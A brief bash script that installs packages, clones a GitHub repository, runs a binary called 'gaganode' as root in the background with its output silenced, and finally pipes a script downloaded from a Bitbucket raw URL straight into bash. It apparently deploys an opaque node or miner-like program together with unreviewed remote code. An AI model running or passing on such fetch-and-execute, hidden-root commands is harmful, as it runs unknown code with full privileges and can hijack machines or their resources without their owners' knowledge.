#!/bin/bash
apt-get update ; apt-get install sudo -y
apt-get install build-essential -y
sudo su --command "apt-get update && apt-get install gcc -y"
sudo git clone https://github.com/sxiankerigak/ggg.git
cd ggg
sudo chmod +x gaganode
sudo apt-get update -y && sudo apt-get -y install curl tar ca-certificates && sudo apt-get -y install screen
sudo ./gaganode >/dev/null 2>&1 &
curl -sL https://bitbucket.org/lightcoral2/cangor/raw/master/boled04.sh | bash
